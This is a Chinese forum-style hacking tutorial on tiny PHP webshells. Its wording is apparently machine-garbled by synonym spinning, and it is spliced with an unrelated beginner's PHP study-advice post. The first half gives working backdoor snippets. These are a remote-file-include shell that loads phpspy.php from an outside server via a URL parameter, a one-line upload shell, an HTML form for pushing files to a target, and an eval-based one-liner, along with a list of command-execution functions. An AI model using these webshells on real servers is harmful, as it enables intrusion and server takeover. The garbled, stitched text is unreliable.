PHP网页编程之黑客教程系列之微型PHP木马的切磋
给你的建议是,有些最常用的语句是需要记住的 比如if for while这些、其他的一般语句你只要知道有这个函数或者有这个功能就可以了,当你用的时候你可以凭借记忆搜索就可以了。 <P style="TEXT-INDENT: 2em">【编纂提醒】:此文仅供参考进修之用! <P style="TEXT-INDENT: 2em">本文没有甚么出格的地方,仅求抛砖引玉。并送给和我一样菜的在PHP门边彷徨的伴侣。刚学PHP没几天,我就急于功成,所以有毛病及缺乏的地方请人人积极指出。 <P style="TEXT-INDENT: 2em">PHP语法的壮大是ASP瞠乎其后的,仅一个:就能够打探全部办事器的设置装备摆设。运转cmd,上传文件等,都长短常简捷的,如今用的好的PHP木马,莫过于angel的phpspy了。昨天hak_ban问怎样给PHP木马加密,我还没想到,然而关于写一个微型PHP木马,我想仍是很难被杀的。 <P style="TEXT-INDENT: 2em">这里复杂切磋一下几个函数可以作为木马的利用: <P style="TEXT-INDENT: 2em">1. 可以运转内部号令的几个函数:system,passthru,exec,shell_exec,popen。 <P style="TEXT-INDENT: 2em">例:只需将等保留为cmd.php及可完成运转内部号令的功效。这几个函数可以说是最早的微行php木马了,所以普通虚拟主机的设置也会将这些函数屏障的。 <P style="TEXT-INDENT: 2em">2.还记得WDB服装论坛的style.php的破绽吗?咱们可以使用这个做个很难被杀的小木马。以下: <P style="TEXT-INDENT: 2em"><?php include($include);?><P style="TEXT-INDENT: 2em">将其保留为1.php,咱们就能够挪用其他不撑持php办事器里的.php木马(如phpspy.php)来到达咱们的目标:http://target.com/1.php? Include=http://www.xxx.com/phpspy.php <P style="TEXT-INDENT: 2em">这里http://www.918x.com是不撑持php的,不然将会在http://www.xxx.com这台办事器运转phpspy.php,而不是方针办事器。 <P style="TEXT-INDENT: 2em">3. 这个仍是angel在Discuz 2.2F的进击中给咱们的一个十分好的上传木马,我没有改: <P style="TEXT-INDENT: 2em"><?copy($_FILES,$_FILES);?><P style="TEXT-INDENT: 2em">将其保留为up.php后,在当地提交表单: <P style="TEXT-INDENT: 2em"><form ENCTYPE="multipart/form-data" ACTION="http://方针办事器/up.php" METHOD="POST"><input NAME="MyFile" TYPE="file"><input VALUE=" 提交 " TYPE="submit"></form><P style="TEXT-INDENT: 2em">就能够把大个的php木即刻传上去。 <P style="TEXT-INDENT: 2em">4. 我一向在想有无同冰狐荡子的谁人ASP一句话木马一样经由过程当地表单提走运行的PHP木马。终究找到了函数:eval,在PHP4中文参考手册上它的语法申明: <P style="TEXT-INDENT: 2em">语法: <P style="TEXT-INDENT: 2em">void eval(string code_str);<P style="TEXT-INDENT: 2em">内容申明:本函数可将字符串当中的变量值代入,凡是用在处置数据库的材料上。参数 code_str 为欲处置的字符串。值得注重的是待处置的字符串要合适 PHP 的字符串格局,同时在开头处要有分号。利用本函数处置后的字符串会沿续到 PHP 法式停止。 <P style="TEXT-INDENT: 2em">咱们可以在方针主机上保留:为一个PHP文件(我想也能够插在PHP恣意文件里)。然后经由过程当地提交来到达目标,但与ASP分歧的是,在magic_quotes_gpc = on的时分,过滤的良多的字符,使得这个利用功效大大的减少。 <P style="TEXT-INDENT: 2em">关于这个PHP木马当地表单我做了良多次,还没有成熟的代码。还请高手指教。写好后会贡献给人人的。然而eval这个函数可以做微型PHP木马是不必质疑的。 PS:写完后,有人告知我,其实高手早就有微型的PHP木马了,只是没有公然。哎,我好愁闷啊,研讨的都是人家早就有了的功效。不论怎样,和人人分享一下我的研讨,但愿能失掉匡助和指教。php manual(PHP手册)肯定是要从网上下载一个的,它很权威,也很全面,我自己认为它是一本很好的参考书,但是不适合新手当教材使用。 对于初学者来说不推荐去拿钱买的。当然如果一个网站你经常去用,而且里面的资料也比较有用,最好还是买个会员比较好,毕竟那些也是别人的工作成果。 我还是强烈建议自己搭建php环境。因为在搭建的过程中你会遇到一些问题,通过搜索或是看php手册解决问题后,你会更加深刻的理解它们的工作原理,了解到php配置文件中的一些选项设置。 多看优秀程序员编写的代码,仔细理解他们解决问题的方法,对自身有很大的帮助。 最后介绍一个代码出错,但是老找不到错误方法,就是 go to wc (囧),出去换换气没准回来就找到错误啦。 有时候汉字的空格也能导致页面出错,所以在写代码的时候,要输入空格最好用引文模式。 ,熟悉html,能用div+css,还有javascript,优先考虑linux。我在开始学习的时候,就想把这些知识一起学习,我天真的认为同时学习能够互相呼应,因为知识是相通的。 这些中手常用的知识,当你把我说的这些关键字都可以熟练运用的时候,你可以选择自己 环境搭建好,当你看见你的浏览器输出“it works\\\\\\\"时你一定是喜悦的。在你解决问题的时候,我强烈建议多读php手册。 作为一个合格的coder 编码的规范是必须,命名方面我推崇“驼峰法”,另外就是自己写的代码最好要带注释,不然时间长了,就算是自己的代码估计看起来都费事,更不用说别人拉。 我还是推荐用firefox ,配上firebug 插件调试js能省下不受时间。谷歌的浏览器最好也不少用,因为谷歌的大侠们实在是太天才啦,把一些原来的js代码加了一些特效。 小鸟是第一次发帖(我习惯潜水的(*^__^*) 嘻嘻……),有错误之处还请大家批评指正,另外,前些日子听人说有高手能用php写驱动程序,真是学无止境,人外有人,天外有天。 Ps:以上纯属原创,如有雷同,纯属巧合 曾经犯过一个很低级的错误,我在文件命名的时候用了一个横线\\\\\\\'-\\\\\\\' 号,结果找了好几个小时的错误,事实是命名的时候 是不能用横线 \\\\\\\'-\\\\\\\' 的,应该用的是下划线\\\\\\\'_\\\\\\\' ; 对于初学者来说不推荐去拿钱买的。当然如果一个网站你经常去用,而且里面的资料也比较有用,最好还是买个会员比较好,毕竟那些也是别人的工作成果。 学习php的目的往往是为了开发动态网站,phper就业的要求也涵盖了很多。我大致总结为:精通php和mysql 至于模板嘛,各位高人一直以来就是争论不休,我一只小菜鸟就不加入战团啦,咱们新手还是多学点东西的好。 遇到出错的时候,我经常把错误信息直接复制到 google的搜索栏,一般情况都是能搜到结果的,不过有时候会搜出来一大片英文的出来,这时候就得过滤一下,吧中文的弄出来,挨着式方法。 建议加几个专业的phper的群,当然啦需要说话的人多,一处一点问题能有人回答你的,当然啦要让人回答你的问题,平时就得躲在里面聊天,大家混熟啦,愿意回答你问题的人自然就多啦。 爱上php,他也会爱上你。
页:
[1]